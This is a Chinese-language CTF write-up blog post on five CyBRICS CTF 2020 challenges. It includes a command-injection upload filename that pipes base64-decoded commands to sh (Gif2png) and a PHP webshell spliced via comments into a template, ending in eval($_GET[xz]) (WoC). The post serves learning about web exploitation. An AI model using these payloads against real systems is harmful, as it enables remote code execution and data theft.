CyBRICS CTF 2020

ctf web

字数统计: 2.2k阅读时长: 12 min

 2020/07/26   Share

Mic Check (Cyber, Baby, 50 pts)

Have you read the game rules? There’s a flag there. But this year it’s ENCRYPTED, the same way as UserAssist values in Windows.

Also be sure to join @cybrics Telegram chat for challenge-related announcements and contacting orgs in case all goes wrong

https://www.jisuan.mobi/puzzm6z1B1HH6yXW.html

Hunt (Web, Baby, 50 pts)

缩小页面,一个个点

也可以js修改前端
如:[https://github.com/csivitu/CTF-Write-ups/tree/master/CyBRICS%20CTF/Web/Hunt](https://github.com/csivitu/CTF-Write-ups/tree/master/CyBRICS CTF/Web/Hunt)

http://109.233.57.94:54040/getprize.php?g-recaptcha-response=%7C03AGdBq26SQq8ph8H-H24ftIFbrFci2iZMdZPK_zkqgWre5J8iAuv1UiZ0dUMSNdRnQK44Q0_Mn0urWFmz0uVRemFeP_kJgXJpqQFXMXKoJtHrVmdRwp40FSPlyssyxsHBV0EZyX85zoqan2TKklJf_s0iBhOG83tk4lWR4M3AX23epULb3of9Q7-SnutUB2o6tZ2VzQqW9wt7zD8ZGu0NXnxWON4uYPEHe6D4lv_n1-bc0a8Pi93leLHHv6ysgAP98mphZ0Jqo_eHYmj7ltzz0fseu0-CvGOA3vNMlkAgdWN_Dj7qVvOCP6bMfwa3tpfiXyUxFPdQ_imxT6wEHLuYHIgKJD9Vjl7yTV8ESYO2neN_Xui6AEbmq2sIgrv7SSBw6E39FQSMh9Kf%7C03AGdBq27w5EkgjgaOTg8DQSCaw9sMdXKJDuE9QelMS7gkkBj2ezZWMZZHZ-8q4zEDzSSlAT8Hf6mU97lfs5ctlJeoppbXDfBc61P9R4qZupZioBpBLhtvvjXoiC5bkNlD5J9FpTqdURS195dpKiEVU-mRQNpv9iTncFCOmmvTo26xMzyAWyykRA50p1Q9hBEO2Lyg6kPIEU3TT3pKzSexHMabLheQkIWDJFsvNx6eXnvi37oWPm6yApKLLgVfHqPXsxgMeVlzjbpPQYg7HzlS0NOadrgs_qK0WdmicU76z_N6saIfCfdwqNrMT-TD3BusCE3wJe1b76lB8NYkdKrI-tBCAwyysoiXJaQhihvOcx9fAjPeQjYmd-w2C0vmnv0xeILoxL_WHE69%7C03AGdBq26J_TQoV_tFZWsbFO2kMy0a0g3PF-DZVY-Knmu4w9EWpSBOkbFYXhD7QQ6IsngoDSNQHZAj45b-MxYiyMAhrRsQdy0LYNoX_dXDBDTXFgbMXF3PNyazGELkUGH8lxJxhjqbbdnYQWIci0zWHV0HopnnTtev0a4RUyKRQUmAzzY6cLoM_XmHswXZmQrFDP62ycQ2HYkqrMD5SAb4huqh3ewMFd7dplR4VTawccs4C-RaUanjVMNqYZsOB90_Kr1OkmNtgd0FW7PT8qDRSep75eiMK8xFS2v4T_pm9J2aOOXYRmKQ_FcgDre0dIpuUBPwaPR9ZpTd-tYJpNlUmHXvLl0_ZjArG8_Bm4oV3fjaJgv8nmnjP7FpPzMwHhBt_Gkd37d41-g7%7C03AGdBq25pj2WAiwIRMcb5JCDmScURew5wmp6CdSpY8RAf_vJMqFIczdakr-vCoafpOBZ0S27tJ4Qip0fRxjIdIXFKarpZwvl2J4ovb56X-6VfqBcwpdIlakMGpOWatY51wkshIHRs9pAK6p22qH-3gPL-kf1YucGQkr9IQskZ3fofmXldbwerM1Nr1k1eT9naFcqVjZzd7FON3agWX94zQsJmhvt4KS_zsI_Tk7IwnuHHEoWIcI7HPQKH8Hz7vUwB8bZz_gyyNgof_35vovvoli6TJ5op9hl0Oe-EQen0n7ZHwlTsD5a7V6gY_TYL8bTdK46VVo_VtuUsoreVTlBDYj3Sx2ktGJu0SiRcN2CQSwyR4gERXe4JTfMPBbk4W6FjLCdNv1WxeogF%7C03AGdBq24TQIR1os8HBsDvg2wl8sDzzkuupVbTX-Kmz8DyuVmf06k_AlIQtxfUWJip_RjLhrkb35K20iWVr0UI6aE75OVEp0irlaW4p9jyhQS5lpxl9EmH83oQ-9D7-PB-VjdCsQduHDHJDlcbJNofvObPsq6nci2X7YAiFCC9-7osL3i0hZIEeLtriILLPzWL4MHJM52kqTqVHD4KAthspGNuPiFpdruX3fvDJLELLUVEQfmHc7xT8wG74ksiK8VUbqFFGits6tFXbn4xTzXisHgEufsyO9QU3T49hjSn16zKU5E9nFGxzlq4jW2tGiVk16iZQhovmHWInLk5m0p6DS2-PQ2QTVAi1x9InTTeSMRygI9XzPhppy0ntrKkFY4AlRoIgL8kyZtU

Gif2png (Web, Easy, 238 pts)

根据源代码,此题的大致思路是要读取main.py文件中的ffLaG值

一开始的想法是构造软连接,但问题是此题有文件上传和下载功能,可惜的是没有利用软连接的点。

之后重新审计代码,注意到有一个命令执行点,同时可控参数为file.filename

构造payload

注意正则匹配是^[a-zA-Z0-9_-. ‘"=$()|]*$ 最后一个.xxx要.gif 以及image/gif

# 创建main.py的tar文件,并移到已经upload文件夹中的UUID或任一文件夹中
tar -cvf uploads/8f41d93e-5b12-4fcf-98a7-7294588a570e/1.tar main.py
# base64 : dGFyIC1jdmYgdXBsb2Fkcy84ZjQxZDkzZS01YjEyLTRmY2YtOThhNy03Mjk0NTg4YTU3MGUvMS50YXIgbWFpbi5weQ==


' fe1w0 || echo ' echo 'dGFyIC1jdmYgdXBsb2Fkcy84ZjQxZDkzZS01YjEyLTRmY2YtOThhNy03Mjk0NTg4YTU3MGUvMS50YXIgbWFpbi5weQ=='|base64 -d|sh||'1.gif
# fe1w0 是为了强制前面出错
# 之后下载tar文件就行

XCorp (Network, Baby, 50 pts)

Author: Artur Khanov (@awengar)

We got into the XCorp network and captured some traffic from an employee’s machine. Looks like they were using some in-house software that keeps their secrets.

xcorp.tar.gz

这题队友做出来了，大致思路是从pcap中提取net10.exe文件,并根据pcap中的用户信息进行登录,当用户名加密后等于xcorporation 即可输出flag。

WoC (Web, Medium, 237 pts)

Author: Vlad Roskov (@mrvos)

http://109.233.57.94:40389/calcs/85d45135a1c6f4c3/cc4b5923-6498-44ff-391a-03a16f35d485.php

Heheh heh hehh… 🤓

Source code: woc.tar.gz

喜欢题目名字 🐕.jpg

最终步骤应该是读取flag文件,可惜没做出来,

错误的思路如下:

根据正则匹配,构造webshell

1	#(?=^([ %()+\-./]+\|\d+\|M_PI\|M_E\|log\|rand\|sqrt\|a?(sin\|cos\|tan)h?)+$)^([^()]\|([^()]$(?>[^()]+\|(?4))$[^()]))$#s

之后在此执行

字母的构造

利用数组计算错误来得到,字符

php > var_dump((0/0).(0));
PHP Warning:  Division by zero in php shell code on line 1

Warning: Division by zero in php shell code on line 1
string(4) "NAN0"


php > var_dump((1/0).(0));
PHP Warning:  Division by zero in php shell code on line 1

Warning: Division by zero in php shell code on line 1
string(4) "INF0

到此就卡住了,因为正则匹配过滤了{} 、[]导致无法取出字符串中的字符,之后通过$a++和字符拼接的方法构造webshell

正确的思路：

https://www.gem-love.com/ctf/2526.html

利用构造的模板html和多行过滤字符,对原来的语句进行拼接,从而构造webshell

主要利用的语句

1
2

file_put_contents("calcs/$userid/$calc.php", "<script>var preloadValue = <?=json_encode((string)($field))?>;</script>\n" . file_get_contents("inc/calclib.html") . file_get_contents("calcs/$userid/templates/$template.html"));
redir("?p=sharelink&calc=$calc");  // 重定向于分享连接  sharklink.php   calc传给sharelink.php文件

通过写文件和多行过滤($field)来拼接webshell页面,即calcs/$userid/$calc.php

构造的模板html

<html>
    <head>
        <meta charset="utf-8">
        <title>iPhone X (test)</title>
        <style>#field{top:37px;left:151px;width:565px;height:43px;background:black;border:0;color:#fff;font-family:Arial,sans-serif;font-size:40px;text-align:right;}#digit0{top:307px;left:468px;width:124px;height:47px;}#digit1{top:252px;left:465px;width:59px;height:47px;}#digit2{top:252px;left:531px;width:61px;height:48px;}#digit3{top:252px;left:598px;width:58px;height:48px;}#digit4{top:196px;left:465px;width:61px;height:48px;}#digit5{top:199px;left:534px;width:54px;height:44px;}#digit6{top:198px;left:597px;width:59px;height:47px;}#digit7{top:142px;left:466px;width:60px;height:46px;}#digit8{top:143px;left:534px;width:57px;height:46px;}#digit9{top:141px;left:599px;width:57px;height:49px;}#plus{top:252px;left:664px;width:58px;height:47px;}#minus{top:200px;left:665px;width:57px;height:42px;}#times{top:144px;left:664px;width:58px;height:45px;}#div{top:84px;left:665px;width:56px;height:48px;}#point{top:308px;left:600px;width:54px;height:48px;}#percent{top:88px;left:599px;width:56px;height:44px;}#sinh{top:309px;left:136px;width:59px;height:44px;}#cosh{top:309px;left:201px;width:60px;height:46px;}#tanh{top:309px;left:268px;width:61px;height:45px;}#pi{top:308px;left:334px;width:59px;height:46px;}#rand{top:309px;left:401px;width:57px;height:45px;}#e{top:252px;left:335px;width:58px;height:47px;}#sin{top:252px;left:136px;width:58px;height:48px;}#cos{top:252px;left:202px;width:58px;height:46px;}#tan{top:255px;left:268px;width:59px;height:43px;}#sqrt{top:198px;left:134px;width:59px;height:46px;}#log{top:197px;left:332px;width:60px;height:45px;}#obrace{top:89px;left:71px;width:56px;height:45px;}#cbrace{top:87px;left:136px;width:57px;height:46px;}#sq{top:142px;left:135px;width:59px;height:46px;}#cb{top:142px;left:202px;width:59px;height:46px;}#pow{top:143px;left:269px;width:58px;height:46px;}#epow{top:142px;left:335px;width:55px;height:47px;}#tenpow{top:140px;left:399px;width:59px;height:47px;}#clear{top:84px;left:465px;width:60px;height:49px;}#back{top:356px;left:295px;width:202px;height:15px;}#share{top:-29px;left:788px;width:93px;height:39px;opacity:1;font-size:22px;}#equals{top:307px;left:665px;width:57px;height:49px;}</style>
    </head>
    <body>
        <table border=0 cellspacing=0 cellpadding=0 width='100%' height='100%'><tr><td align='center' valign='middle'>
        <form method="POST" style='display: inline-block; position: relative;'>
            <img src="https://9to5mac.com/wp-content/uploads/sites/6/2018/05/iphone-calculator-tips-tricks-2.jpg?quality=82&strip=all" style="height: 400px" />
            <input type="text" class="part" id="field" name="field" />
            <input type="button" class="part" id="digit0" data-append="0" />
            <input type="button" class="part" id="digit1" data-append="1" />
            <input type="button" class="part" id="digit2" data-append="2" />
            <input type="button" class="part" id="digit3" data-append="3" />
            <input type="button" class="part" id="digit4" data-append="4" />
            <input type="button" class="part" id="digit5" data-append="5" />
            <input type="button" class="part" id="digit6" data-append="6" />
            <input type="button" class="part" id="digit7" data-append="7" />
            <input type="button" class="part" id="digit8" data-append="8" />
            <input type="button" class="part" id="digit9" data-append="9" />
            <input type="button" class="part" id="plus" data-append=" + " />
            <input type="button" class="part" id="minus" data-append=" - " />
            <input type="button" class="part" id="times" data-append=" * " />
            <input type="button" class="part" id="div" data-append=" / " />
            <input type="button" class="part" id="point" data-append="." />
            <input type="button" class="part" id="percent" data-append="%" />
            <input type="button" class="part" id="sinh" data-append=" sinh(" />
            <input type="button" class="part" id="cosh" data-append=" cosh(" />
            <input type="button" class="part" id="tanh" data-append=" tanh(" />
            <input type="button" class="part" id="pi" data-append=" M_PI " />
            <input type="button" class="part" id="rand" data-append=" rand() " />
            <input type="button" class="part" id="e" data-append=" M_E " />
            <input type="button" class="part" id="sin" data-append=" sin(" />
            <input type="button" class="part" id="cos" data-append=" cos(" />
            <input type="button" class="part" id="tan" data-append=" tan(" />
            <input type="button" class="part" id="sqrt" data-append=" sqrt(" />
            <input type="button" class="part" id="log" data-append=" log(" />
            <input type="button" class="part" id="obrace" data-append="(" />
            <input type="button" class="part" id="cbrace" data-append=")" />
            <input type="button" class="part" id="sq" data-append="**2" />
            <input type="button" class="part" id="cb" data-append="**3" />
            <input type="button" class="part" id="pow" data-append=" ** " />
            <input type="button" class="part" id="epow" data-append=" M_E ** " />
            <input type="button" class="part" id="tenpow" data-append=" 10 ** " />
            <input type="button" class="part" id="clear" />
            <input type="button" class="part" id="back" value="← Back" />
            <input type="submit" class="part" id="share" name="share" value="Share" />
            <input type="submit" class="part" id="equals" />
        </form>
        </td></tr></table>
    </body>
</html>*/;eval($_GET[xz]);?>

多行注释符

file_put_contents("calcs/$userid/$calc.php", "<script>var preloadValue = <?=json_encode((string)($field))?>;</script>\n" . file_get_contents("inc/calclib.html") . file_get_contents("calcs/$userid/templates/$template.html"));

/*((*/1))/*  #为了符合正则表达式

<?=json_encode((string)(/*((*/1))/*))*/;eval($_GET[xz]);?>

原文作者：fe1w0

原文链接：https://fe1w0.github.io/2020/07/26/CyBRICS-CTF-2020/

发表日期：July 26th 2020, 11:00:47 pm

更新日期：March 15th 2021, 12:20:11 am

Next Post

20208月到9月初的wp合集
Previous Post

安恒月赛20200725

CATALOG

1. Mic Check (Cyber, Baby, 50 pts)
2. Hunt (Web, Baby, 50 pts)
3. Gif2png (Web, Easy, 238 pts)
4. XCorp (Network, Baby, 50 pts)
5. WoC (Web, Medium, 237 pts)



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true